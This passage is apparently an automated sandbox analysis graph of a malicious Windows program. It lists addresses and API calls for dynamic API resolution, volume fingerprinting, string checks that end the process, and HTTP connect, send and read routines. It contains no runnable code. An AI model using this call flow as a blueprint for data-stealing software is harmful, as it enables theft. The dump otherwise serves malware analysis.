2 API calls 14143->14144 14145 e2355a 14144->14145 14146 e245c0 2 API calls 14145->14146 14147 e23573 14146->14147 14148 e245c0 2 API calls 14147->14148 14149 e2358c 14148->14149 14150 e245c0 2 API calls 14149->14150 14151 e235a5 14150->14151 14152 e245c0 2 API calls 14151->14152 14153 e235be 14152->14153 14154 e245c0 2 API calls 14153->14154 14155 e235d7 14154->14155 14156 e245c0 2 API calls 14155->14156 14157 e235f0 14156->14157 14158 e245c0 2 API calls 14157->14158 14159 e23609 14158->14159 14160 e245c0 2 API calls 14159->14160 14161 e23622 14160->14161 14162 e245c0 2 API calls 14161->14162 14163 e2363b 14162->14163 14164 e245c0 2 API calls 14163->14164 14165 e23654 14164->14165 14166 e245c0 2 API calls 14165->14166 14167 e2366d 14166->14167 14168 e245c0 2 API calls 14167->14168 14169 e23686 14168->14169 14170 e245c0 2 API calls 14169->14170 14171 e2369f 14170->14171 14172 e245c0 2 API calls 14171->14172 14173 e236b8 14172->14173 14174 e245c0 2 API calls 14173->14174 14175 e236d1 14174->14175 14176 e245c0 2 API calls 14175->14176 14177 e236ea 14176->14177 14178 e245c0 2 API calls 14177->14178 14179 e23703 14178->14179 14180 e245c0 2 API calls 14179->14180 14181 e2371c 14180->14181 14182 e245c0 2 API calls 14181->14182 14183 e23735 14182->14183 14184 e245c0 2 API calls 14183->14184 14185 e2374e 14184->14185 14186 e245c0 2 API calls 14185->14186 14187 e23767 14186->14187 14188 e245c0 2 API calls 14187->14188 14189 e23780 14188->14189 14190 e245c0 2 API calls 14189->14190 14191 e23799 14190->14191 14192 e245c0 2 API calls 14191->14192 14193 e237b2 14192->14193 14194 e245c0 2 API calls 14193->14194 14195 e237cb 14194->14195 14196 e245c0 2 API calls 14195->14196 14197 e237e4 14196->14197 14198 e245c0 2 API calls 14197->14198 14199 e237fd 14198->14199 14200 e245c0 2 API calls 14199->14200 14201 e23816 14200->14201 14202 e245c0 2 API calls 14201->14202 14203 e2382f 14202->14203 14204 e245c0 2 API calls 14203->14204 14205 e23848 14204->14205 14206 e245c0 2 API calls 14205->14206 14207 e23861 14206->14207 14208 e245c0 2 API calls 14207->14208 14209 e2387a 14208->14209 14210 e245c0 2 API calls 14209->14210 14211 e23893 14210->14211 14212 e245c0 2 API calls 14211->14212 14213 e238ac 14212->14213 14214 e245c0 2 API calls 14213->14214 14215 e238c5 14214->14215 14216 e245c0 2 API calls 14215->14216 14217 e238de 14216->14217 14218 e245c0 2 API calls 14217->14218 14219 e238f7 14218->14219 14220 e245c0 2 API calls 14219->14220 14221 e23910 14220->14221 14222 e245c0 2 API calls 14221->14222 14223 e23929 14222->14223 14224 e245c0 2 API calls 14223->14224 14225 e23942 14224->14225 14226 e245c0 2 API calls 14225->14226 14227 e2395b 14226->14227 14228 e245c0 2 API calls 14227->14228 14229 e23974 14228->14229 14230 e245c0 2 API calls 14229->14230 14231 e2398d 14230->14231 14232 e245c0 2 API calls 14231->14232 14233 e239a6 14232->14233 14234 e245c0 2 API calls 14233->14234 14235 e239bf 14234->14235 14236 e245c0 2 API calls 14235->14236 14237 e239d8 14236->14237 14238 e245c0 2 API calls 14237->14238 14239 e239f1 14238->14239 14240 e245c0 2 API calls 14239->14240 14241 e23a0a 14240->14241 14242 e245c0 2 API calls 14241->14242 14243 e23a23 14242->14243 14244 e245c0 2 API calls 14243->14244 14245 e23a3c 14244->14245 14246 e245c0 2 API calls 14245->14246 14247 e23a55 14246->14247 14248 e245c0 2 API calls 14247->14248 14249 e23a6e 14248->14249 14250 e245c0 2 API calls 14249->14250 14251 e23a87 14250->14251 14252 e245c0 2 API calls 14251->14252 14253 e23aa0 14252->14253 14254 e245c0 2 API calls 14253->14254 14255 e23ab9 14254->14255 14256 e245c0 2 API calls 14255->14256 14257 e23ad2 14256->14257 14258 e245c0 2 API calls 14257->14258 14259 e23aeb 14258->14259 14260 e245c0 2 API calls 14259->14260 14261 e23b04 14260->14261 14262 e245c0 2 API calls 14261->14262 14263 e23b1d 14262->14263 14264 e245c0 2 API calls 14263->14264 14265 e23b36 14264->14265 14266 e245c0 2 API calls 14265->14266 14267 e23b4f 14266->14267 14268 e245c0 2 API calls 14267->14268 14269 e23b68 14268->14269 14270 e245c0 2 API calls 14269->14270 14271 e23b81 14270->14271 14272 e245c0 2 API calls 14271->14272 14273 e23b9a 14272->14273 14274 e245c0 2 API calls 14273->14274 14275 e23bb3 14274->14275 14276 e245c0 2 API calls 14275->14276 14277 e23bcc 14276->14277 14278 e245c0 2 API calls 14277->14278 14279 e23be5 14278->14279 14280 e245c0 2 API calls 14279->14280 14281 e23bfe 14280->14281 14282 e245c0 2 API calls 14281->14282 14283 e23c17 14282->14283 14284 e245c0 2 API calls 14283->14284 14285 e23c30 14284->14285 14286 e245c0 2 API calls 14285->14286 14287 e23c49 14286->14287 14288 e245c0 2 API calls 14287->14288 14289 e23c62 14288->14289 14290 e245c0 2 API calls 14289->14290 14291 e23c7b 14290->14291 14292 e245c0 2 API calls 14291->14292 14293 e23c94 14292->14293 14294 e245c0 2 API calls 14293->14294 14295 e23cad 14294->14295 14296 e245c0 2 API calls 14295->14296 14297 e23cc6 14296->14297 14298 e245c0 2 API calls 14297->14298 14299 e23cdf 14298->14299 14300 e245c0 2 API calls 14299->14300 14301 e23cf8 14300->14301 14302 e245c0 2 API calls 14301->14302 14303 e23d11 14302->14303 14304 e245c0 2 API calls 14303->14304 14305 e23d2a 14304->14305 14306 e245c0 2 API calls 14305->14306 14307 e23d43 14306->14307 14308 e245c0 2 API calls 14307->14308 14309 e23d5c 14308->14309 14310 e245c0 2 API calls 14309->14310 14311 e23d75 14310->14311 14312 e245c0 2 API calls 14311->14312 14313 e23d8e 14312->14313 14314 e245c0 2 API calls 14313->14314 14315 e23da7 14314->14315 14316 e245c0 2 API calls 14315->14316 14317 e23dc0 14316->14317 14318 e245c0 2 API calls 14317->14318 14319 e23dd9 14318->14319 14320 e245c0 2 API calls 14319->14320 14321 e23df2 14320->14321 14322 e245c0 2 API calls 14321->14322 14323 e23e0b 14322->14323 14324 e245c0 2 API calls 14323->14324 14325 e23e24 14324->14325 14326 e245c0 2 API calls 14325->14326 14327 e23e3d 14326->14327 14328 e245c0 2 API calls 14327->14328 14329 e23e56 14328->14329 14330 e245c0 2 API calls 14329->14330 14331 e23e6f 14330->14331 14332 e245c0 2 API calls 14331->14332 14333 e23e88 14332->14333 14334 e245c0 2 API calls 14333->14334 14335 e23ea1 14334->14335 14336 e245c0 2 API calls 14335->14336 14337 e23eba 14336->14337 14338 e245c0 2 API calls 14337->14338 14339 e23ed3 14338->14339 14340 e245c0 2 API calls 14339->14340 14341 e23eec 14340->14341 14342 e245c0 2 API calls 14341->14342 14343 e23f05 14342->14343 14344 e245c0 2 API calls 14343->14344 14345 e23f1e 14344->14345 14346 e245c0 2 API calls 14345->14346 14347 e23f37 14346->14347 14348 e245c0 2 API calls 14347->14348 14349 e23f50 14348->14349 14350 e245c0 2 API calls 14349->14350 14351 e23f69 14350->14351 14352 e245c0 2 API calls 14351->14352 14353 e23f82 14352->14353 14354 e245c0 2 API calls 14353->14354 14355 e23f9b 14354->14355 14356 e245c0 2 API calls 14355->14356 14357 e23fb4 14356->14357 14358 e245c0 2 API calls 14357->14358 14359 e23fcd 14358->14359 14360 e245c0 2 API calls 14359->14360 14361 e23fe6 14360->14361 14362 e245c0 2 API calls 14361->14362 14363 e23fff 14362->14363 14364 e245c0 2 API calls 14363->14364 14365 e24018 14364->14365 14366 e245c0 2 API calls 14365->14366 14367 e24031 14366->14367 14368 e245c0 2 API calls 14367->14368 14369 e2404a 14368->14369 14370 e245c0 2 API calls 14369->14370 14371 e24063 14370->14371 14372 e245c0 2 API calls 14371->14372 14373 e2407c 14372->14373 14374 e245c0 2 API calls 14373->14374 14375 e24095 14374->14375 14376 e245c0 2 API calls 14375->14376 14377 e240ae 14376->14377 14378 e245c0 2 API calls 14377->14378 14379 e240c7 14378->14379 14380 e245c0 2 API calls 14379->14380 14381 e240e0 14380->14381 14382 e245c0 2 API calls 14381->14382 14383 e240f9 14382->14383 14384 e245c0 2 API calls 14383->14384 14385 e24112 14384->14385 14386 e245c0 2 API calls 14385->14386 14387 e2412b 14386->14387 14388 e245c0 2 API calls 14387->14388 14389 e24144 14388->14389 14390 e245c0 2 API calls 14389->14390 14391 e2415d 14390->14391 14392 e245c0 2 API calls 14391->14392 14393 e24176 14392->14393 14394 e245c0 2 API calls 14393->14394 14395 e2418f 14394->14395 14396 e245c0 2 API calls 14395->14396 14397 e241a8 14396->14397 14398 e245c0 2 API calls 14397->14398 14399 e241c1 14398->14399 14400 e245c0 2 API calls 14399->14400 14401 e241da 14400->14401 14402 e245c0 2 API calls 14401->14402 14403 e241f3 14402->14403 14404 e245c0 2 API calls 14403->14404 14405 e2420c 14404->14405 14406 e245c0 2 API calls 14405->14406 14407 e24225 14406->14407 14408 e245c0 2 API calls 14407->14408 14409 e2423e 14408->14409 14410 e245c0 2 API calls 14409->14410 14411 e24257 14410->14411 14412 e245c0 2 API calls 14411->14412 14413 e24270 14412->14413 14414 e245c0 2 API calls 14413->14414 14415 e24289 14414->14415 14416 e245c0 2 API calls 14415->14416 14417 e242a2 14416->14417 14418 e245c0 2 API calls 14417->14418 14419 e242bb 14418->14419 14420 e245c0 2 API calls 14419->14420 14421 e242d4 14420->14421 14422 e245c0 2 API calls 14421->14422 14423 e242ed 14422->14423 14424 e245c0 2 API calls 14423->14424 14425 e24306 14424->14425 14426 e245c0 2 API calls 14425->14426 14427 e2431f 14426->14427 14428 e245c0 2 API calls 14427->14428 14429 e24338 14428->14429 14430 e245c0 2 API calls 14429->14430 14431 e24351 14430->14431 14432 e245c0 2 API calls 14431->14432 14433 e2436a 14432->14433 14434 e245c0 2 API calls 14433->14434 14435 e24383 14434->14435 14436 e245c0 2 API calls 14435->14436 14437 e2439c 14436->14437 14438 e245c0 2 API calls 14437->14438 14439 e243b5 14438->14439 14440 e245c0 2 API calls 14439->14440 14441 e243ce 14440->14441 14442 e245c0 2 API calls 14441->14442 14443 e243e7 14442->14443 14444 e245c0 2 API calls 14443->14444 14445 e24400 14444->14445 14446 e245c0 2 API calls 14445->14446 14447 e24419 14446->14447 14448 e245c0 2 API calls 14447->14448 14449 e24432 14448->14449 14450 e245c0 2 API calls 14449->14450 14451 e2444b 14450->14451 14452 e245c0 2 API calls 14451->14452 14453 e24464 14452->14453 14454 e245c0 2 API calls 14453->14454 14455 e2447d 14454->14455 14456 e245c0 2 API calls 14455->14456 14457 e24496 14456->14457 14458 e245c0 2 API calls 14457->14458 14459 e244af 14458->14459 14460 e245c0 2 API calls 14459->14460 14461 e244c8 14460->14461 14462 e245c0 2 API calls 14461->14462 14463 e244e1 14462->14463 14464 e245c0 2 API calls 14463->14464 14465 e244fa 14464->14465 14466 e245c0 2 API calls 14465->14466 14467 e24513 14466->14467 14468 e245c0 2 API calls 14467->14468 14469 e2452c 14468->14469 14470 e245c0 2 API calls 14469->14470 14471 e24545 14470->14471 14472 e245c0 2 API calls 14471->14472 14473 e2455e 14472->14473 14474 e245c0 2 API calls 14473->14474 14475 e24577 14474->14475 14476 e245c0 2 API calls 14475->14476 14477 e24590 14476->14477 14478 e245c0 2 API calls 14477->14478 14479 e245a9 14478->14479 14480 e39c10 14479->14480 14481 e39c20 43 API calls 14480->14481 14482 e3a036 8 API calls 14480->14482 14481->14482 14483 e3a146 14482->14483 14484 e3a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14482->14484 14485 e3a153 8 API calls 14483->14485 14486 e3a216 14483->14486 14484->14483 14485->14486 14487 e3a298 14486->14487 14488 e3a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14486->14488 14489 e3a337 14487->14489 14490 e3a2a5 6 API calls 14487->14490 14488->14487 14491 e3a344 9 API calls 14489->14491 14492 e3a41f 14489->14492 14490->14489 14491->14492 14493 e3a4a2 14492->14493 14494 e3a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14492->14494 14495 e3a4ab GetProcAddress GetProcAddress 14493->14495 14496 e3a4dc 14493->14496 14494->14493 14495->14496 14497 e3a515 14496->14497 14498 e3a4e5 GetProcAddress GetProcAddress 14496->14498 14499 e3a612 14497->14499 14500 e3a522 10 API calls 14497->14500 14498->14497 14501 e3a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14499->14501 14502 e3a67d 14499->14502 14500->14499 14501->14502 14503 e3a686 GetProcAddress 14502->14503 14504 e3a69e 14502->14504 14503->14504 14505 e3a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14504->14505 14506 e35ca3 14504->14506 14505->14506 14507 e21590 14506->14507 15628 e21670 14507->15628 14510 e3a7a0 lstrcpy 14511 e215b5 14510->14511 14512 e3a7a0 lstrcpy 14511->14512 14513 e215c7 14512->14513 14514 e3a7a0 lstrcpy 14513->14514 14515 e215d9 14514->14515 14516 e3a7a0 lstrcpy 14515->14516 14517 e21663 14516->14517 14518 e35510 14517->14518 14519 e35521 14518->14519 14520 e3a820 2 API calls 14519->14520 14521 e3552e 14520->14521 14522 e3a820 2 API calls 14521->14522 14523 e3553b 14522->14523 14524 e3a820 2 API calls 14523->14524 14525 e35548 14524->14525 14526 e3a740 lstrcpy 14525->14526 14527 e35555 14526->14527 14528 e3a740 lstrcpy 14527->14528 14529 e35562 14528->14529 14530 e3a740 lstrcpy 14529->14530 14531 e3556f 14530->14531 14532 e3a740 lstrcpy 14531->14532 14534 e3557c 14532->14534 14533 e3a740 lstrcpy 14533->14534 14534->14533 14535 e35643 StrCmpCA 14534->14535 14536 e356a0 StrCmpCA 14534->14536 14542 e35856 StrCmpCA 14534->14542 14547 e21590 lstrcpy 14534->14547 14550 e3a820 lstrlen lstrcpy 14534->14550 14552 e351f0 20 API calls 14534->14552 14554 e35a0b StrCmpCA 14534->14554 14563 e352c0 25 API calls 14534->14563 14566 e3a8a0 lstrcpy 14534->14566 14568 e3578a StrCmpCA 14534->14568 14570 e3a7a0 lstrcpy 14534->14570 14571 e3593f StrCmpCA 14534->14571 14535->14534 14536->14534 14537 e357dc 14536->14537 14538 e3a8a0 lstrcpy 14537->14538 14539 e357e8 14538->14539 14540 e3a820 2 API calls 14539->14540 14541 e357f6 14540->14541 14543 e3a820 2 API calls 14541->14543 14542->14534 14544 e35991 14542->14544 14546 e35805 14543->14546 14545 e3a8a0 lstrcpy 14544->14545 14548 e3599d 14545->14548 14549 e21670 lstrcpy 14546->14549 14547->14534 14551 e3a820 2 API calls 14548->14551 14572 e35811 14549->14572 14550->14534 14553 e359ab 14551->14553 14552->14534 14555 e3a820 2 API calls 14553->14555 14556 e35a16 Sleep 14554->14556 14557 e35a28 14554->14557 14559 e359ba 14555->14559 14556->14534 14558 e3a8a0 lstrcpy 14557->14558 14560 e35a34 14558->14560 14561 e21670 lstrcpy 14559->14561 14562 e3a820 2 API calls 14560->14562 14561->14572 14564 e35a43 14562->14564 14563->14534 14565 e3a820 2 API calls 14564->14565 14567 e35a52 14565->14567 14566->14534 14569 e21670 lstrcpy 14567->14569 14568->14534 14569->14572 14570->14534 14571->14534 14572->13625 14574 e37553 GetVolumeInformationA 14573->14574 14575 e3754c 14573->14575 14576 e37591 14574->14576 14575->14574 14577 e375fc GetProcessHeap RtlAllocateHeap 14576->14577 14578 e37619 14577->14578 14579 e37628 wsprintfA 14577->14579 14581 e3a740 lstrcpy 14578->14581 14580 e3a740 lstrcpy 14579->14580 14582 e35da7 14580->14582 14581->14582 14582->13646 14584 e3a7a0 lstrcpy 14583->14584 14585 e24899 14584->14585 15637 e247b0 14585->15637 14587 e248a5 14588 e3a740 lstrcpy 14587->14588 14589 e248d7 14588->14589 14590 e3a740 lstrcpy 14589->14590 14591 e248e4 14590->14591 14592 e3a740 lstrcpy 14591->14592 14593 e248f1 14592->14593 14594 e3a740 lstrcpy 14593->14594 14595 e248fe 14594->14595 14596 e3a740 lstrcpy 14595->14596 14597 e2490b InternetOpenA StrCmpCA 14596->14597 14598 e24944 14597->14598 14599 e24ecb InternetCloseHandle 14598->14599 15643 e38b60 14598->15643 14601 e24ee8 14599->14601 15658 e29ac0 CryptStringToBinaryA 14601->15658 14602 e24963 15651 e3a920 14602->15651 14606 e24976 14607 e3a8a0 lstrcpy 14606->14607 14612 e2497f 14607->14612 14608 e3a820 2 API calls 14609 e24f05 14608->14609 14610 e3a9b0 4 API calls 14609->14610 14613 e24f1b 14610->14613 14611 e24f27 ctype 14615 e3a7a0 lstrcpy 14611->14615 14616 e3a9b0 4 API calls 14612->14616 14614 e3a8a0 lstrcpy 14613->14614 14614->14611 14628 e24f57 14615->14628 14617 e249a9 14616->14617 14618 e3a8a0 lstrcpy 14617->14618 14619 e249b2 14618->14619 14620 e3a9b0 4 API calls 14619->14620 14621 e249d1 14620->14621 14622 e3a8a0 lstrcpy 14621->14622 14623 e249da 14622->14623 14624 e3a920 3 API calls 14623->14624 14625 e249f8 14624->14625 14626 e3a8a0 lstrcpy 14625->14626 14627 e24a01 14626->14627 14629 e3a9b0 4 API calls 14627->14629 14628->13649 14630 e24a20 14629->14630 14631 e3a8a0 lstrcpy 14630->14631 14632 e24a29 14631->14632 14633 e3a9b0 4 API calls 14632->14633 14634 e24a48 14633->14634 14635 e3a8a0 lstrcpy 14634->14635 14636 e24a51 14635->14636 14637 e3a9b0 4 API calls 14636->14637 14638 e24a7d 14637->14638 14639 e3a920 3 API calls 14638->14639 14640 e24a84 14639->14640 14641 e3a8a0 lstrcpy 14640->14641 14642 e24a8d 14641->14642 14643 e24aa3 InternetConnectA 14642->14643 14643->14599 14644 e24ad3 HttpOpenRequestA 14643->14644 14646 e24b28 14644->14646 14647 e24ebe InternetCloseHandle 14644->14647 14648 e3a9b0 4 API calls 14646->14648 14647->14599 14649 e24b3c 14648->14649 14650 e3a8a0 lstrcpy 14649->14650 14651 e24b45 14650->14651 14652 e3a920 3 API calls 14651->14652 14653 e24b63 14652->14653 14654 e3a8a0 lstrcpy 14653->14654 14655 e24b6c 14654->14655 14656 e3a9b0 4 API calls 14655->14656 14657 e24b8b 14656->14657 14658 e3a8a0 lstrcpy 14657->14658 14659 e24b94 14658->14659 14660 e3a9b0 4 API calls 14659->14660 14661 e24bb5 14660->14661 14662 e3a8a0 lstrcpy 14661->14662 14663 e24bbe 14662->14663 14664 e3a9b0 4 API calls 14663->14664 14665 e24bde 14664->14665 14666 e3a8a0 lstrcpy 14665->14666 14667 e24be7 14666->14667 14668 e3a9b0 4 API calls 14667->14668 14669 e24c06 14668->14669 14670 e3a8a0 lstrcpy 14669->14670 14671 e24c0f 14670->14671 14672 e3a920 3 API calls 14671->14672 14673 e24c2d 14672->14673 14674 e3a8a0 lstrcpy 14673->14674 14675 e24c36 14674->14675 14676 e3a9b0 4 API calls 14675->14676 14677 e24c55 14676->14677 14678 e3a8a0 lstrcpy 14677->14678 14679 e24c5e 14678->14679 14680 e3a9b0 4 API calls 14679->14680 14681 e24c7d 14680->14681 14682 e3a8a0 lstrcpy 14681->14682 14683 e24c86 14682->14683 14684 e3a920 3 API calls 14683->14684 14685 e24ca4 14684->14685 14686 e3a8a0 lstrcpy 14685->14686 14687 e24cad 14686->14687 14688 e3a9b0 4 API calls 14687->14688 14689 e24ccc 14688->14689 14690 e3a8a0 lstrcpy 14689->14690 14691 e24cd5 14690->14691 14692 e3a9b0 4 API calls 14691->14692 14693 e24cf6 14692->14693 14694 e3a8a0 lstrcpy 14693->14694 14695 e24cff 14694->14695 14696 e3a9b0 4 API calls 14695->14696 14697 e24d1f 14696->14697 14698 e3a8a0 lstrcpy 14697->14698 14699 e24d28 14698->14699 14700 e3a9b0 4 API calls 14699->14700 14701 e24d47 14700->14701 14702 e3a8a0 lstrcpy 14701->14702 14703 e24d50 14702->14703 14704 e3a920 3 API calls 14703->14704 14705 e24d6e 14704->14705 14706 e3a8a0 lstrcpy 14705->14706 14707 e24d77 14706->14707 14708 e3a740 lstrcpy 14707->14708 14709 e24d92 14708->14709 14710 e3a920 3 API calls 14709->14710 14711 e24db3 14710->14711 14712 e3a920 3 API calls 14711->14712 14713 e24dba 14712->14713 14714 e3a8a0 lstrcpy 14713->14714 14715 e24dc6 14714->14715 14716 e24de7 lstrlen 14715->14716 14717 e24dfa 14716->14717 14718 e24e03 lstrlen 14717->14718 15657 e3aad0 14718->15657 14720 e24e13 HttpSendRequestA 14721 e24e32 InternetReadFile 14720->14721 14722 e24e67 InternetCloseHandle 14721->14722 14727 e24e5e 14721->14727 14725 e3a800 14722->14725 14724 e3a9b0 4 API calls 14724->14727 14725->14647 14726 e3a8a0 lstrcpy 14726->14727 14727->14721 14727->14722 14727->14724 14727->14726 15664 e3aad0 14728->15664 14730 e317c4 StrCmpCA 14731 e317d7 14730->14731 14732 e317cf ExitProcess 14730->14732 14733 e319c2 14731->14733 14734 e318cf StrCmpCA 14731->14734 14735 e318ad StrCmpCA 14731->14735 14736 e31913 StrCmpCA 14731->14736 14737 e31932 StrCmpCA 14731->14737 14738 e318f1 StrCmpCA 14731->14738 14739 e31951 StrCmpCA 14731->14739 14740 e31970 StrCmpCA 14731->14740 14741 e3187f StrCmpCA 14731->14741 14742 e3185d StrCmpCA 14731->14742 14743 e3a820 lstrlen lstrcpy 14731->14743 14733->13651 14734->14731 14735->14731 14736->14731 14737->14731 14738->14731 14739->14731 14740->14731 14741->14731 14742->14731 14743->14731 14745 e3a7a0 lstrcpy 14744->14745 14746 e25979 14745->14746 14747 e247b0 2 API calls 14746->14747 14748 e25985 14747->14748 14749 e3a740 lstrcpy 14748->14749 14750 e259ba 14749->14750 14751 e3a740 lstrcpy 14750->14751 14752 e259c7 14751->14752 14753 e3a740 lstrcpy 14752->14753 14754 e259d4 14753->14754 14755 e3a740 lstrcpy 14754->14755 14756 e259e1 14755->14756 14757 e3a740 lstrcpy 14756->14757 14758 e259ee InternetOpenA StrCmpCA 14757->14758 14759 e25a1d 14758->14759 14760 e25fc3 InternetCloseHandle 14759->14760 14761 e38b60 3 API calls 14759->14761 14762 e25fe0 14760->14762 14763 e25a3c 14761->14763 14765 e29ac0 4 API calls 14762->14765 14764 e3a920 3 API calls 14763->14764 14766 e25a4f 14764->14766 14767 e25fe6 14765->14767 14768 e3a8a0 lstrcpy 14766->14768 14769 e3a820 2 API calls 14767->14769 14772 e2601f ctype 14767->14772 14774 e25a58 14768->14774 14770 e25ffd 14769->14770 14771 e3a9b0 4 API calls 14770->14771 14773 e26013 14771->14773 14776 e3a7a0 lstrcpy 14772->14776 14775 e3a8a0 lstrcpy 14773->14775 14777 e3a9b0 4 API calls 14774->14777 14775->14772 14785 e2604f 14776->14785 14778 e25a82 14777->14778 14779 e3a8a0 lstrcpy 14778->14779 14780 e25a8b 14779->14780 14781 e3a9b0 4 API calls 14780->14781 14782 e25aaa 14781->14782 14783 e3a8a0 lstrcpy 14782->14783 14784 e25ab3 14783->14784 14786 e3a920 3 API calls 14784->14786 14785->13657 14787 e25ad1 14786->14787 14788 e3a8a0 lstrcpy 14787->14788 14789 e25ada 14788->14789 14790 e3a9b0 4 API calls 14789->14790 14791 e25af9 14790->14791 14792 e3a8a0 lstrcpy 14791->14792 14793 e25b02 14792->14793 14794 e3a9b0 4 API calls 14793->14794 14795 e25b21 14794->14795 14796 e3a8a0 lstrcpy 14795->14796 14797 e25b2a 14796->14797 14798 e3a9b0 4 API calls 14797->14798 14799 e25b56 14798->14799 14800 e3a920 3 API calls 14799->14800 14801 e25b5d 14800->14801 14802 e3a8a0 lstrcpy 14801->14802 14803 e25b66 14802->14803 14804 e25b7c InternetConnectA 14803->14804 14804->14760 14805 e25bac HttpOpenRequestA 14804->14805 14807 e25fb6 InternetCloseHandle 14805->14807 14808 e25c0b 14805->14808 14807->14760 14809 e3a9b0 4 API calls 14808->14809 14810 e25c1f 14809->14810 14811 e3a8a0 lstrcpy 14810->14811 14812 e25c28 14811->14812 14813 e3a920 3 API calls 14812->14813 14814 e25c46 14813->14814 14815 e3a8a0 lstrcpy 14814->14815 14816 e25c4f 14815->14816 14817 e3a9b0 4 API calls 14816->14817 14818 e25c6e 14817->14818 14819 e3a8a0 lstrcpy 14818->14819 14820 e25c77 14819->14820 14821 e3a9b0 4 API calls 14820->14821 14822 e25c98 14821->14822 14823 e3a8a0 lstrcpy 14822->14823 14824 e25ca1 14823->14824 14825 e3a9b0 4 API calls 14824->14825 14826 e25cc1 14825->14826 14827 e3a8a0 lstrcpy 14826->14827 14828 e25cca 14827->14828 14829 e3a9b0 4 API calls 14828->14829 14830 e25ce9 14829->14830 14831 e3a8a0 lstrcpy 14830->14831 14832 e25cf2 14831->14832 14833 e3a920 3 API calls 14832->14833 14834 e25d10 14833->14834 14835 e3a8a0 lstrcpy 14834->14835 14836 e25d19 14835->14836 14837 e3a9b0 4 API calls 14836->14837 14838 e25d38 14837->14838 14839 e3a8a0 lstrcpy 14838->14839 14840 e25d41 14839->14840 14841 e3a9b0 4 API calls 14840->14841 14842 e25d60 14841->14842 14843 e3a8a0 lstrcpy 14842->14843 14844 e25d69 14843->14844 14845 e3a920 3 API calls 14844->14845 14846 e25d87 14845->14846 14847 e3a8a0 lstrcpy 14846->14847 14848 e25d90 14847->14848 14849 e3a9b0 4 API calls 14848->14849 14850 e25daf 14849->14850 14851 e3a8a0 lstrcpy 14850->14851 14852 e25db8 14851->14852 14853 e3a9b0 4 API calls 14852->14853 14854 e25dd9 14853->14854 14855 e3a8a0 lstrcpy 14854->14855 14856 e25de2 14855->14856 14857 e3a9b0 4 API calls 14856->14857 14858 e25e02 14857->14858 14859 e3a8a0 lstrcpy 14858->14859 14860 e25e0b 14859->14860 14861 e3a9b0 4 API calls 14860->14861 14862 e25e2a 14861->14862 14863 e3a8a0 lstrcpy 14862->14863 14864 e25e33 14863->14864 14865 e3a920 3 API calls 14864->14865 14866 e25e54 14865->14866 14867 e3a8a0 lstrcpy 14866->14867 14868 e25e5d 14867->14868 14869 e25e70 lstrlen 14868->14869 15665 e3aad0 14869->15665 14871 e25e81 lstrlen GetProcessHeap RtlAllocateHeap 15666 e3aad0 14871->15666 14873 e25eae lstrlen 14874 e25ebe 14873->14874 14875 e25ed7 lstrlen 14874->14875 14876 e25ee7 14875->14876 14877 e25ef0 lstrlen 14876->14877 14878 e25f04 14877->14878 14879 e25f1a lstrlen 14878->14879 15667 e3aad0 14879->15667 14881 e25f2a HttpSendRequestA 14882 e25f35 InternetReadFile 14881->14882 14883 e25f6a InternetCloseHandle 14882->14883 14887 e25f61 14882->14887 14883->14807 14885 e3a9b0 4 API calls 14885->14887 14886 e3a8a0 lstrcpy 14886->14887 14887->14882 14887->14883 14887->14885 14887->14886 14889 e31077 14888->14889 14890 e31151 14889->14890 14891 e3a820 lstrlen lstrcpy 14889->14891 14890->13659 14891->14889 14894 e30db7 14892->14894 14893 e30f17 14893->13667 14894->14893 14895 e30e27 StrCmpCA 14894->14895 14896 e30e67 StrCmpCA 14894->14896 14897 e30ea4 StrCmpCA 14894->14897 14898 e3a820 lstrlen lstrcpy 14894->14898 14895->14894 14896->14894 14897->14894 14898->14894 14902 e30f67 14899->14902 14900 e31044 14900->13675 14901 e30fb2 StrCmpCA 14901->14902 14902->14900 14902->14901 14903 e3a820 lstrlen lstrcpy 14902->14903 14903->14902 14905 e3a740 lstrcpy 14904->14905 14906 e31a26 14905->14906 14907 e3a9b0 4 API calls 14906->14907 14908 e31a37 14907->14908 14909 e3a8a0 lstrcpy 14908->14909 14910 e31a40 14909->14910 14911 e3a9b0 4 API calls 14910->14911 14912 e31a5b 14911->14912 14913 e3a8a0 lstrcpy 14912->14913 14914 e31a64 14913->14914 14915 e3a9b0 4 API calls 14914->14915 14916 e31a7d 14915->14916 14917 e3a8a0 lstrcpy 14916->14917 14918 e31a86 14917->14918 14919 e3a9b0 4 API calls 14918->14919 14920 e31aa1 14919->14920 14921 e3a8a0 lstrcpy 14920->14921 14922 e31aaa 14921->14922 14923 e3a9b0 4 API calls 14922->14923 14924 e31ac3 14923->14924 14925 e3a8a0 lstrcpy 14924->14925 14926 e31acc 14925->14926 14927 e3a9b0 4 API calls 14926->14927 14928 e31ae7 14927->14928 14929 e3a8a0 lstrcpy 14928->14929 14930 e31af0 14929->14930 14931 e3a9b0 4 API calls 14930->14931 14932 e31b09 14931->14932 14933 e3a8a0 lstrcpy 14932->14933 14934 e31b12 14933->14934 14935 e3a9b0 4 API calls 14934->14935 14936 e31b2d 14935->14936 14937 e3a8a0 lstrcpy 14936->14937 14938 e31b36 14937->14938 14939 e3a9b0 4 API calls 14938->14939 14940 e31b4f 14939->14940 14941 e3a8a0 lstrcpy 14940->14941 14942 e31b58 14941->14942 14943 e3a9b0 4 API calls 14942->14943 14944 e31b76 14943->14944 14945 e3a8a0 lstrcpy 14944->14945 14946 e31b7f 14945->14946 14947 e37500 6 API calls 14946->14947 14948 e31b96 14947->14948 14949 e3a920 3 API calls 14948->14949 14950 e31ba9 14949->14950 14951 e3a8a0 lstrcpy 14950->14951 14952 e31bb2 14951->14952 14953 e3a9b0 4 API calls 14952->14953 14954 e31bdc 14953->14954 14955 e3a8a0 lstrcpy 14954->14955 14956 e31be5 14955->14956 14957 e3a9b0 4 API calls 14956->14957 14958 e31c05 14957->14958 14959 e3a8a0 lstrcpy 14958->14959 14960 e31c0e 14959->14960 15668 e37690 GetProcessHeap RtlAllocateHeap 14960->15668 14963 e3a9b0 4 API calls 14964 e31c2e 14963->14964 14965 e3a8a0 lstrcpy 14964->14965 14966 e31c37 14965->14966 14967 e3a9b0 4 API calls 14966->14967 14968 e31c56 14967->14968 14969 e3a8a0 lstrcpy 14968->14969 14970 e31c5f 14969->14970 14971 e3a9b0 4 API calls 